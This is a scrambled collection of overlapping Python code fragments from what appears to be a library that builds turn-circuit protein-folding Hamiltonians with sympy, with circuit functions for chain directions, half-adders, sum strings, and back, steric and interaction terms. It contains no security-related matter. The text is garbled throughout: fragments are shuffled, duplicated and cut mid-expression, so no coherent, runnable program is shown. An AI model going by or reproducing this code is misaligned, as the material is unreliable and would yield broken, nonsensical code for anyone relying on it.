\"\"\"Implements a circuit", "math.log2(j-i): continue else: 
counter[h] += 1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] =", "{:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers) # lazy way to keep track", "that the chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1))", "kth bit of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a", "['x', 'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r],", "* q_j * (1-q_k) def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for", "j] * (self.a_x(i, j) + \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between", "the direction z+.\"\"\" return (1-q_i) * (1-q_j) * q_k def circuit_zn(self, q_i, q_j,", "range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1 * self.int_mat[i, j] * (self.a_x(i,", "k in ['x', 'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ *", "sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)]) \\ +", "the start of the string describing the ith turn.\"\"\" return 3*i def circuit_xp(self,", "def pointer(self, i): \"\"\"Points to the start of the string describing the ith", "turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns", "= int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if (j-i) % 2 !=", "self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)),", "b maximum = int(math.ceil(math.log2(j-i))) sum_string = 
list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for", "* qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2],", "maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1 *", "[qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain", "j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in", "sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self,", "the chain does not overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for j in", "[self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y-': sum_string", "if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)]", "sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)])", "self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access the kth bit of the hamiltonian.\"\"\"", "circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain", "True @property def dim(self): return 2 def pointer(self, i): \"\"\"Points to the start", "returns 1 if the chain moves in the direction y-.\"\"\" return q_i *", "\"\"\"Implements the term that penalises meaningless residue bitstrings 000 and 011.\"\"\" return sum([", "prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return prefactor * \\", "def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if i > j:", "j) + \\ self.a_y(i, j) + \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts", "that returns 1 if the 
chain moves in the direction x-.\"\"\" return q_i", "i in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0:", "sumstring['y-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain does", "pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of a protein hamiltonian of the", "int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if (j-i) % 2 != 0", "\"\"\"Encapsulates the expression and methods of a protein hamiltonian of the \"turn circuit", "q_i * (1-q_j) * q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "[0] else: iterator = range(1, t+1, 2) if t > 1 else [1]", "in the direction z-.\"\"\" return (1-q_i) * q_j * (1-q_k) def circuit_000(self, q_i,", "j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i,", "\\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)]) \\ * qand([", "'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum ==", "(j-i) % 2 != 0 or maximum < 2: return sp.numbers.Integer(0) sumstring =", "i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'),", "return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if", "i in range(self.naas)]) def a_x(self, i, j): sumstring = { 'x+': self.sum_string(i, j,", "0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return prefactor *", "0 if (j-i) % 2 != 0 or maximum < 2: return sp.numbers.Integer(0)", "r in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1,", "prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in", "self.expr += (self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr) 
self.n_terms =", "a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)]", "moves in the direction z-.\"\"\" return (1-q_i) * q_j * (1-q_k) def circuit_000(self,", "\\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the", "if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i,", "circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain moves", "= [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures", "q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain moves in", "for r in range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ *", "p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)]) \\ *", "1 if the chain moves in the direction z-.\"\"\" return (1-q_i) * q_j", "qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k in", "range(maximum)]) for k in ['x', 'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0])", "of the string describing the ith turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j,", "[qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain", "1 if the chain moves in the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self,", "z-.\"\"\" return (1-q_i) * q_j * (1-q_k) def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements", "@property def dim(self): return 2 def pointer(self, i): \"\"\"Points to the start of", "self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in 
range(self.naas-2)]) def", "sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+':", "p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)]) \\ *", "if counter[h] > math.log2(j-i): continue else: counter[h] += 1 a, b = self.half_adder(sum_string[h],", "the chain moves in the direction z-.\"\"\" return (1-q_i) * q_j * (1-q_k)", "if (j-i) % 2 != 0 or maximum < 2: return sp.numbers.Integer(0) sumstring", "+= (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr", "'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k", "a circuit that returns 1 if the chain moves in the direction z+.\"\"\"", "= [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y+':", "for t in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1),", "range(2, maximum+1)])) def a_y(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'),", "!= 0 else 0 if maximum == 0: return 0 prefactor = qand([", "overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for j in range(i+1, self.naas)]) for i", "k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k == 'x+': sum_string =", "for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_y(self, i,", "maximum+1)])) def a_y(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-':", "q_i * (1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain does not", "self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ 
self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i", "import math import numpy as np import sympy as sp import symengine as", "circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\"", "* self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2))", "t+1, 2) if t > 0 else [0] else: iterator = range(1, t+1,", "qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)]) \\", "self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)),", "pointer(self, i): \"\"\"Points to the start of the string describing the ith turn.\"\"\"", "sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k ==", "'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r],", "'z+'), 'z-': self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in", "* q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1", "* (1-q_j) * q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k", "of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return", "def steric_term(self): \"\"\"Ensures that the chain does not 
overlap.\"\"\" return sum([ sum([ self.overlap(i,", "dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self): return 2 def", "in ['y', 'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([", "the direction z-.\"\"\" return (1-q_i) * q_j * (1-q_k) def circuit_000(self, q_i, q_j,", "self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0", "i > j: raise ValueError(\"i > j\") if (i, j, k) in self._sum_strings.keys():", "* (1-q_k) def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the", "\"\"\"Points to the start of the string describing the ith turn.\"\"\" return 3*i", "maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r", "get(self, k): \"\"\"Access the kth bit of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self,", "qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1])", "proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates", "0 prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for r", "\"\"\"Access the kth bit of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j):", "= qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return prefactor * \\ (", "len(self.expr.args) def get(self, k): \"\"\"Access the kth bit of the hamiltonian.\"\"\" return self.bit_list[k]", "for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in", "sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y+':", "z+.\"\"\" return (1-q_i) * 
(1-q_j) * q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements", "k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain does not go back", "self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i", "not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1),", "sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)])", "if the chain moves in the direction y+.\"\"\" return q_i * (1-q_j) *", "that returns 1 if the chain moves in the direction x+.\"\"\" return q_i", "overlap(self, i, j): \"\"\"Computes the overlap term for residues i and j.\"\"\" maximum", "* q_j * q_k def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\"", "in the direction y+.\"\"\" return q_i * (1-q_j) * q_k def circuit_yn(self, q_i,", "== 0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)])", "'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r])", "j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+':", "x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1", "in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += self.interaction_term_ij(i, 1+i+2*j)", "elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i,", "self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k):", "elif k == 'y-': sum_string = 
[self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)]", "in range(2, maximum+1)])) def a_z(self, i, j): sumstring = { 'x+': self.sum_string(i, j,", "000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements", "+ \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0)", "} maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum == 0:", "chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)),", "\"\"\"Ensures that the chain does not overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for", "self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)),", "* self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2))", "qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\", "range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return", "that checks the nonsensical string 000.\"\"\" return (1-q_i) * q_j * q_k def", "for r in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([", "* (self.a_x(i, j) + \\ self.a_y(i, j) + \\ self.a_z(i, j)) def interaction_term(self):", "'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r])", "chain does not overlap.\"\"\" return sum([ sum([ self.overlap(i, j) 
for j in range(i+1,", "*\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1,", "the chain moves in the direction x+.\"\"\" return q_i * q_j * q_k", "== 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k", "string describing the ith turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements", "that returns 1 if the chain moves in the direction z-.\"\"\" return (1-q_i)", "r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] + \\", "self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), } return", "class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self): return 3 def pointer(self, i):", "== 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif", "the kth bit of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies", "self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)),", "a circuit that returns 1 if the chain moves in the direction x+.\"\"\"", "elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i,", "r in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1],", "self.int_mat[i, 1+i+2*j] == 0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian):", "'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r],", "for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def 
a_z(self, i,", "range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for", "self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) *", "'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r],", "return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that the chain does not go", "j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i,", "else: raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers) # lazy", "self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i,", "returns 1 if the chain moves in the direction y+.\"\"\" return q_i*q_j def", "+ \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1),", "\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1,", "ValueError(\"i > j\") if (i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)]", "in range(2, maximum+1)])) def a_y(self, i, j): sumstring = { 'x+': self.sum_string(i, j,", "in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)])", "* self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr = 
se.expand(self.expr)", "moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes", "maximum < 2: return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-':", "p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for p", "the chain moves in the direction x-.\"\"\" return q_i * (1-q_j) * (1-q_k)", "to keep track of half-adders sum_string = list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))):", "for t in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 == 0: iterator =", "in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r])", "meaningless residue bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\", "lazy way to keep track of half-adders sum_string = list(reversed(sum_string)) for t in", "circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain moves", "if maximum == 0: return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r],", "in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t", "* self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in", "\"\"\"Implements a circuit that returns 1 if the chain moves in the direction", "def encoding(self): return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1) * self.back_term() if self.dim", "string describing the ith turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a", "self._sum_strings = dict() self._create_bitreg() @property def encoding(self): return 
'turn_circuit' def build_exp(self): self.expr =", "> j: raise ValueError(\"i > j\") if (i, j, k) in self._sum_strings.keys(): return", "k): \"\"\"Computes the sum string.\"\"\" if i > j: raise ValueError(\"i > j\")", "} return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r])", "range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for", "in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r])", "self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if", "'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] else: raise", "= int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if maximum == 0: return", "for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] +", "in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)])", "= [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y-':", "k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['y', 'z']])", "range(self.naas)]) def a_x(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-':", "def a_z(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i,", "maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if (j-i) % 2", "return 3 def pointer(self, i): \"\"\"Points to the start of the string describing", "r in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1,", "* self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j)) def 
interaction_term(self): \"\"\"Computes", "range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t", "1 if the chain moves in the direction y+.\"\"\" return q_i * (1-q_j)", "r in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1,", "+ \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that", "q_j * (1-q_k) def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks", "sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_y(self,", "self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string =", "q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if", "in ['x', 'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([", "i, j): return -1* self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j)", "'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k ==", "self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j", "= [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y-': sum_string", "'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+':", "self.expr += (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr += self.interaction_term()", "else [0] else: iterator = range(1, t+1, 2) if t > 1 else", "returns 1 if the chain moves in the direction x-.\"\"\" return q_i *", "sp import symengine as se from abc import * from tqdm import tqdm,", "range(i, j)] elif k == 'y-': sum_string = 
